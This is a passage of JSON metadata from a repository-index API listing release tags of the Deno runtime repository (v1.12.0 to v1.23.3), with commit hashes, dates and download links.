https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/